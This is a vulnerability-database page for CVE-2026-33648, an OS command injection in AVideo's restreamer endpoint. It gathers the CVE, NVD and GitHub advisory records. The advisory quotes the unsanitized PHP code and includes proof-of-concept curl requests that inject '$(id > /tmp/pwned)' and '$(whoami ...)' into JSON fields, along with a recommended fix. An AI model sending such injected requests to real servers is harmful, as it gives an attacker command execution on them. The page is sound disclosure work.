Vulnerability-Lookup

CVE-2026-33648 (GCVE-0-2026-33648)

Vulnerability from cvelistv5 – Published: 2026-03-23 18:25 – Updated: 2026-03-25 14:28

Title

AVideo Vulnerable to OS Command Injection via Unsanitized `users_id` and `liveTransmitionHistory_id` in Restreamer Log File Path

Summary

WWBN AVideo is an open source video platform. In versions up to and including 26.0, the restreamer endpoint constructs a log file path by embedding user-controlled `users_id` and `liveTransmitionHistory_id` values from the JSON request body without any sanitization. This log file path is then concatenated directly into shell commands passed to `exec()`, allowing an authenticated user to achieve arbitrary command execution on the server via shell metacharacters such as `$()` or backticks. Commit 99b865413172045fef6a98b5e9bfc7b24da11678 contains a patch.

Severity

8.8 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

SSVC

Exploitation: poc Automatable: no Technical Impact: total

CISA Coordinator (v2.0.3)

CWE

CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Assigner

GitHub_M

References

2 references

URL	Tags
https://github.com/WWBN/AVideo/security/advisorie…	x_refsource_CONFIRM
https://github.com/WWBN/AVideo/commit/99b86541317…	x_refsource_MISC

Impacted products

1 product

Vendor	Product	Version
WWBN	AVideo	Affected: <= 26.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-33648",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-25T14:25:45.099058Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-25T14:28:05.154Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "AVideo",
          "vendor": "WWBN",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c= 26.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the restreamer endpoint constructs a log file path by embedding user-controlled `users_id` and `liveTransmitionHistory_id` values from the JSON request body without any sanitization. This log file path is then concatenated directly into shell commands passed to `exec()`, allowing an authenticated user to achieve arbitrary command execution on the server via shell metacharacters such as `$()` or backticks. Commit 99b865413172045fef6a98b5e9bfc7b24da11678 contains a patch."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-78",
              "description": "CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-23T18:25:07.130Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/WWBN/AVideo/security/advisories/GHSA-5m4q-5cvx-36mw",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-5m4q-5cvx-36mw"
        },
        {
          "name": "https://github.com/WWBN/AVideo/commit/99b865413172045fef6a98b5e9bfc7b24da11678",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/WWBN/AVideo/commit/99b865413172045fef6a98b5e9bfc7b24da11678"
        }
      ],
      "source": {
        "advisory": "GHSA-5m4q-5cvx-36mw",
        "discovery": "UNKNOWN"
      },
      "title": "AVideo Vulnerable to OS Command Injection via Unsanitized `users_id` and `liveTransmitionHistory_id` in Restreamer Log File Path"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-33648",
    "datePublished": "2026-03-23T18:25:07.130Z",
    "dateReserved": "2026-03-23T15:23:42.217Z",
    "dateUpdated": "2026-03-25T14:28:05.154Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-33648",
      "date": "2026-06-18",
      "epss": "0.00612",
      "percentile": "0.44576"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-33648\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-23T19:16:40.907\",\"lastModified\":\"2026-03-25T17:55:16.970\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"WWBN AVideo is an open source video platform. In versions up to and including 26.0, the restreamer endpoint constructs a log file path by embedding user-controlled `users_id` and `liveTransmitionHistory_id` values from the JSON request body without any sanitization. This log file path is then concatenated directly into shell commands passed to `exec()`, allowing an authenticated user to achieve arbitrary command execution on the server via shell metacharacters such as `$()` or backticks. Commit 99b865413172045fef6a98b5e9bfc7b24da11678 contains a patch.\"},{\"lang\":\"es\",\"value\":\"WWBN AVideo es una plataforma de video de c\u00f3digo abierto. En versiones hasta la 26.0 inclusive, el endpoint del restreamer construye una ruta de archivo de registro incrustando valores controlados por el usuario `users_id` y `liveTransmitionHistory_id` del cuerpo de la solicitud JSON sin ninguna sanitizaci\u00f3n. Esta ruta de archivo de registro se concatena luego directamente en comandos de shell pasados a `exec()`, permitiendo a un usuario autenticado lograr la ejecuci\u00f3n arbitraria de comandos en el servidor a trav\u00e9s de metacaracteres de shell como `$()` o comillas invertidas. El commit 99b865413172045fef6a98b5e9bfc7b24da11678 contiene un parche.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":8.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-78\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"26.0\",\"matchCriteriaId\":\"774C24F1-9D26-484F-B931-1DA107C8F588\"}]}]}],\"references\":[{\"url\":\"https://github.com/WWBN/AVideo/commit/99b865413172045fef6a98b5e9bfc7b24da11678\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/WWBN/AVideo/security/advisories/GHSA-5m4q-5cvx-36mw\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-33648\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-25T14:25:45.099058Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-25T14:27:57.080Z\"}}], \"cna\": {\"title\": \"AVideo Vulnerable to OS Command Injection via Unsanitized `users_id` and `liveTransmitionHistory_id` in Restreamer Log File Path\", \"source\": {\"advisory\": \"GHSA-5m4q-5cvx-36mw\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 8.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"WWBN\", \"product\": \"AVideo\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c= 26.0\"}]}], \"references\": [{\"url\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-5m4q-5cvx-36mw\", \"name\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-5m4q-5cvx-36mw\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/WWBN/AVideo/commit/99b865413172045fef6a98b5e9bfc7b24da11678\", \"name\": \"https://github.com/WWBN/AVideo/commit/99b865413172045fef6a98b5e9bfc7b24da11678\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"WWBN AVideo is an open source video platform. In versions up to and including 26.0, the restreamer endpoint constructs a log file path by embedding user-controlled `users_id` and `liveTransmitionHistory_id` values from the JSON request body without any sanitization. This log file path is then concatenated directly into shell commands passed to `exec()`, allowing an authenticated user to achieve arbitrary command execution on the server via shell metacharacters such as `$()` or backticks. Commit 99b865413172045fef6a98b5e9bfc7b24da11678 contains a patch.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-78\", \"description\": \"CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-23T18:25:07.130Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-33648\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-25T14:28:05.154Z\", \"dateReserved\": \"2026-03-23T15:23:42.217Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-23T18:25:07.130Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-33648

Vulnerability from fkie_nvd - Published: 2026-03-23 19:16 - Updated: 2026-06-17 10:37

Severity

8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/WWBN/AVideo/commit/99b865413172045fef6a98b5e9bfc7b24da11678	Patch
	security-advisories@github.com	https://github.com/WWBN/AVideo/security/advisories/GHSA-5m4q-5cvx-36mw	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	wwbn	avideo	*

JSON

To clipboard

{
  "affected": [
    {
      "affectedData": [
        {
          "product": "AVideo",
          "vendor": "WWBN",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c= 26.0"
            }
          ]
        }
      ],
      "source": "security-advisories@github.com"
    }
  ],
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "774C24F1-9D26-484F-B931-1DA107C8F588",
              "versionEndIncluding": "26.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the restreamer endpoint constructs a log file path by embedding user-controlled `users_id` and `liveTransmitionHistory_id` values from the JSON request body without any sanitization. This log file path is then concatenated directly into shell commands passed to `exec()`, allowing an authenticated user to achieve arbitrary command execution on the server via shell metacharacters such as `$()` or backticks. Commit 99b865413172045fef6a98b5e9bfc7b24da11678 contains a patch."
    },
    {
      "lang": "es",
      "value": "WWBN AVideo es una plataforma de video de c\u00f3digo abierto. En versiones hasta la 26.0 inclusive, el endpoint del restreamer construye una ruta de archivo de registro incrustando valores controlados por el usuario `users_id` y `liveTransmitionHistory_id` del cuerpo de la solicitud JSON sin ninguna sanitizaci\u00f3n. Esta ruta de archivo de registro se concatena luego directamente en comandos de shell pasados a `exec()`, permitiendo a un usuario autenticado lograr la ejecuci\u00f3n arbitraria de comandos en el servidor a trav\u00e9s de metacaracteres de shell como `$()` o comillas invertidas. El commit 99b865413172045fef6a98b5e9bfc7b24da11678 contiene un parche."
    }
  ],
  "id": "CVE-2026-33648",
  "lastModified": "2026-06-17T10:37:51.677",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.9,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ],
    "ssvcV203": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "ssvcData": {
          "id": "CVE-2026-33648",
          "options": [
            {
              "exploitation": "poc"
            },
            {
              "automatable": "no"
            },
            {
              "technicalImpact": "total"
            }
          ],
          "role": "CISA Coordinator",
          "timestamp": "2026-03-25T14:25:45.099058Z",
          "version": "2.0.3"
        }
      }
    ]
  },
  "published": "2026-03-23T19:16:40.907",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/WWBN/AVideo/commit/99b865413172045fef6a98b5e9bfc7b24da11678"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-5m4q-5cvx-36mw"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-78"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-5M4Q-5CVX-36MW

Vulnerability from github – Published: 2026-03-25 17:47 – Updated: 2026-03-25 17:47

Summary

AVideo Vulnerable to OS Command Injection via Unsanitized `users_id` and `liveTransmitionHistory_id` in Restreamer Log File Path

Details

Summary

The restreamer endpoint constructs a log file path by embedding user-controlled users_id and liveTransmitionHistory_id values from the JSON request body without any sanitization. This log file path is then concatenated directly into shell commands passed to exec(), allowing an authenticated user to achieve arbitrary command execution on the server via shell metacharacters such as $() or backticks.

Details

The vulnerability exists in plugin/Live/standAloneFiles/restreamer.json.php. The data flow is:

1. User input ingestion (line 220):

$request = file_get_contents("php://input");
$robj = json_decode($request);

2. Log file template (line 58):

$logFile = $logFileLocation . "ffmpeg_restreamer_{users_id}_" . date("Y-m-d-h-i-s") . ".log";

3. users_id injected without sanitization (line 318):

$obj->logFile = str_replace('{users_id}', $robj->users_id, $logFile);

4. liveTransmitionHistory_id injected without sanitization (line 407):

$pid[] = startRestream($m3u8, [$value], str_replace(".log", "_{$key}_{$robj->liveTransmitionHistory_id}_{$host}.log", $logFile), $robj);

Note: intval() is applied to liveTransmitionHistory_id in the separate getProcess() function (line 805), but NOT in the runRestream() path that constructs the log file.

5. Unsanitized log file path passed to exec() (lines 720, 723):

// Line 720 (remote ffmpeg path):
execFFMPEGAsyncOrRemote($command . ' > ' . $logFile . ' 2>&1 ', $keyword, '', $restreamStandAloneFFMPEG);

// Line 723 (direct execution fallback):
exec($command . ' > ' . $logFile . ' 2>&1 &');

The code sanitizes stream URLs via clearCommandURL() and uses escapeshellarg() for pgrep patterns elsewhere, but completely neglects the log file path — a classic oversight where one injection vector is hardened while an adjacent one is left open.

PoC

Prerequisites: A valid AVideo account with live streaming permissions and a valid restream token.

Step 1: Obtain a valid live streaming token by starting a live stream through the AVideo interface, or by calling the live API.

Step 2: Send a crafted restream request with shell metacharacters in users_id:

curl -k -X POST "https://TARGET/plugin/Live/standAloneFiles/restreamer.json.php" \
  -H "Content-Type: application/json" \
  -d '{
    "token": "VALID_TOKEN",
    "m3u8": "https://example.com/stream.m3u8",
    "restreamsDestinations": ["rtmp://example.com/live/key"],
    "restreamsToken": ["VALID_TOKEN"],
    "users_id": "x$(id > /tmp/pwned)x",
    "liveTransmitionHistory_id": "1"
  }'

Step 3: The resulting exec call becomes:

ffmpeg ... > /var/www/tmp/ffmpeg_restreamer_x$(id > /tmp/pwned)x_2026-03-20-... .log 2>&1 &

The $() subshell executes id > /tmp/pwned before the redirection is processed.

Step 4: Verify command execution:

curl -k "https://TARGET/tmp/pwned"
# Expected: output of `id` command showing the web server user

The same vector works through liveTransmitionHistory_id:

curl -k -X POST "https://TARGET/plugin/Live/standAloneFiles/restreamer.json.php" \
  -H "Content-Type: application/json" \
  -d '{
    "token": "VALID_TOKEN",
    "m3u8": "https://example.com/stream.m3u8",
    "restreamsDestinations": ["rtmp://example.com/live/key"],
    "restreamsToken": ["VALID_TOKEN"],
    "users_id": "1",
    "liveTransmitionHistory_id": "1$(whoami > /tmp/pwned2)1"
  }'

Impact

An authenticated user with restream permissions can execute arbitrary OS commands on the server with the privileges of the web server process. This allows:

Full server compromise: Reading sensitive files (/etc/passwd, database credentials, .env files)
Data exfiltration: Accessing the AVideo database and all user data
Lateral movement: Using the compromised server as a pivot point
Service disruption: Killing processes, modifying or deleting files
Persistent backdoor: Installing web shells or cron jobs for ongoing access

The authentication requirement (PR:L) limits this to users who have been granted streaming access, but in many AVideo deployments user registration is open, making this effectively a low-barrier attack.

Recommended Fix

Sanitize both users_id and liveTransmitionHistory_id immediately after input, and use escapeshellarg() on the log file path before shell execution.

In restreamer.json.php, after line 220 (input decoding), add input sanitization:

$robj = json_decode($request);
// Sanitize fields that will be used in file paths and shell commands
if (isset($robj->users_id)) {
    $robj->users_id = preg_replace('/[^a-zA-Z0-9_-]/', '', $robj->users_id);
}
if (isset($robj->liveTransmitionHistory_id)) {
    $robj->liveTransmitionHistory_id = intval($robj->liveTransmitionHistory_id);
}

At lines 720 and 723, use escapeshellarg() on the log file path:

// Line 720:
execFFMPEGAsyncOrRemote($command . ' > ' . escapeshellarg($logFile) . ' 2>&1 ', $keyword, '', $restreamStandAloneFFMPEG);

// Line 723:
exec($command . ' > ' . escapeshellarg($logFile) . ' 2>&1 &');

Both fixes should be applied — input sanitization as defense-in-depth, and escapeshellarg() as the direct mitigation at the point of shell execution.

Severity

8.8 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "wwbn/avideo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "26.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33648"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-78"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-25T17:47:21Z",
    "nvd_published_at": "2026-03-23T19:16:40Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nThe restreamer endpoint constructs a log file path by embedding user-controlled `users_id` and `liveTransmitionHistory_id` values from the JSON request body without any sanitization. This log file path is then concatenated directly into shell commands passed to `exec()`, allowing an authenticated user to achieve arbitrary command execution on the server via shell metacharacters such as `$()` or backticks.\n\n## Details\n\nThe vulnerability exists in `plugin/Live/standAloneFiles/restreamer.json.php`. The data flow is:\n\n**1. User input ingestion** (line 220):\n```php\n$request = file_get_contents(\"php://input\");\n$robj = json_decode($request);\n```\n\n**2. Log file template** (line 58):\n```php\n$logFile = $logFileLocation . \"ffmpeg_restreamer_{users_id}_\" . date(\"Y-m-d-h-i-s\") . \".log\";\n```\n\n**3. `users_id` injected without sanitization** (line 318):\n```php\n$obj-\u003elogFile = str_replace(\u0027{users_id}\u0027, $robj-\u003eusers_id, $logFile);\n```\n\n**4. `liveTransmitionHistory_id` injected without sanitization** (line 407):\n```php\n$pid[] = startRestream($m3u8, [$value], str_replace(\".log\", \"_{$key}_{$robj-\u003eliveTransmitionHistory_id}_{$host}.log\", $logFile), $robj);\n```\n\nNote: `intval()` is applied to `liveTransmitionHistory_id` in the separate `getProcess()` function (line 805), but NOT in the `runRestream()` path that constructs the log file.\n\n**5. Unsanitized log file path passed to `exec()`** (lines 720, 723):\n```php\n// Line 720 (remote ffmpeg path):\nexecFFMPEGAsyncOrRemote($command . \u0027 \u003e \u0027 . $logFile . \u0027 2\u003e\u00261 \u0027, $keyword, \u0027\u0027, $restreamStandAloneFFMPEG);\n\n// Line 723 (direct execution fallback):\nexec($command . \u0027 \u003e \u0027 . $logFile . \u0027 2\u003e\u00261 \u0026\u0027);\n```\n\nThe code sanitizes stream URLs via `clearCommandURL()` and uses `escapeshellarg()` for pgrep patterns elsewhere, but completely neglects the log file path \u2014 a classic oversight where one injection vector is hardened while an adjacent one is left open.\n\n## PoC\n\n**Prerequisites:** A valid AVideo account with live streaming permissions and a valid restream token.\n\n**Step 1:** Obtain a valid live streaming token by starting a live stream through the AVideo interface, or by calling the live API.\n\n**Step 2:** Send a crafted restream request with shell metacharacters in `users_id`:\n\n```bash\ncurl -k -X POST \"https://TARGET/plugin/Live/standAloneFiles/restreamer.json.php\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\n    \"token\": \"VALID_TOKEN\",\n    \"m3u8\": \"https://example.com/stream.m3u8\",\n    \"restreamsDestinations\": [\"rtmp://example.com/live/key\"],\n    \"restreamsToken\": [\"VALID_TOKEN\"],\n    \"users_id\": \"x$(id \u003e /tmp/pwned)x\",\n    \"liveTransmitionHistory_id\": \"1\"\n  }\u0027\n```\n\n**Step 3:** The resulting exec call becomes:\n```\nffmpeg ... \u003e /var/www/tmp/ffmpeg_restreamer_x$(id \u003e /tmp/pwned)x_2026-03-20-... .log 2\u003e\u00261 \u0026\n```\n\nThe `$()` subshell executes `id \u003e /tmp/pwned` before the redirection is processed.\n\n**Step 4:** Verify command execution:\n```bash\ncurl -k \"https://TARGET/tmp/pwned\"\n# Expected: output of `id` command showing the web server user\n```\n\nThe same vector works through `liveTransmitionHistory_id`:\n```bash\ncurl -k -X POST \"https://TARGET/plugin/Live/standAloneFiles/restreamer.json.php\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\n    \"token\": \"VALID_TOKEN\",\n    \"m3u8\": \"https://example.com/stream.m3u8\",\n    \"restreamsDestinations\": [\"rtmp://example.com/live/key\"],\n    \"restreamsToken\": [\"VALID_TOKEN\"],\n    \"users_id\": \"1\",\n    \"liveTransmitionHistory_id\": \"1$(whoami \u003e /tmp/pwned2)1\"\n  }\u0027\n```\n\n## Impact\n\nAn authenticated user with restream permissions can execute arbitrary OS commands on the server with the privileges of the web server process. This allows:\n\n- **Full server compromise**: Reading sensitive files (`/etc/passwd`, database credentials, `.env` files)\n- **Data exfiltration**: Accessing the AVideo database and all user data\n- **Lateral movement**: Using the compromised server as a pivot point\n- **Service disruption**: Killing processes, modifying or deleting files\n- **Persistent backdoor**: Installing web shells or cron jobs for ongoing access\n\nThe authentication requirement (PR:L) limits this to users who have been granted streaming access, but in many AVideo deployments user registration is open, making this effectively a low-barrier attack.\n\n## Recommended Fix\n\nSanitize both `users_id` and `liveTransmitionHistory_id` immediately after input, and use `escapeshellarg()` on the log file path before shell execution.\n\n**In `restreamer.json.php`, after line 220 (input decoding), add input sanitization:**\n\n```php\n$robj = json_decode($request);\n// Sanitize fields that will be used in file paths and shell commands\nif (isset($robj-\u003eusers_id)) {\n    $robj-\u003eusers_id = preg_replace(\u0027/[^a-zA-Z0-9_-]/\u0027, \u0027\u0027, $robj-\u003eusers_id);\n}\nif (isset($robj-\u003eliveTransmitionHistory_id)) {\n    $robj-\u003eliveTransmitionHistory_id = intval($robj-\u003eliveTransmitionHistory_id);\n}\n```\n\n**At lines 720 and 723, use `escapeshellarg()` on the log file path:**\n\n```php\n// Line 720:\nexecFFMPEGAsyncOrRemote($command . \u0027 \u003e \u0027 . escapeshellarg($logFile) . \u0027 2\u003e\u00261 \u0027, $keyword, \u0027\u0027, $restreamStandAloneFFMPEG);\n\n// Line 723:\nexec($command . \u0027 \u003e \u0027 . escapeshellarg($logFile) . \u0027 2\u003e\u00261 \u0026\u0027);\n```\n\nBoth fixes should be applied \u2014 input sanitization as defense-in-depth, and `escapeshellarg()` as the direct mitigation at the point of shell execution.",
  "id": "GHSA-5m4q-5cvx-36mw",
  "modified": "2026-03-25T17:47:21Z",
  "published": "2026-03-25T17:47:21Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-5m4q-5cvx-36mw"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33648"
    },
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/commit/99b865413172045fef6a98b5e9bfc7b24da11678"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/WWBN/AVideo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "AVideo Vulnerable to OS Command Injection via Unsanitized `users_id` and `liveTransmitionHistory_id` in Restreamer Log File Path"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-33648 (GCVE-0-2026-33648)

FKIE_CVE-2026-33648

GHSA-5M4Q-5CVX-36MW

Summary

Details

PoC

Impact

Recommended Fix

Tags

Sightings

Nomenclature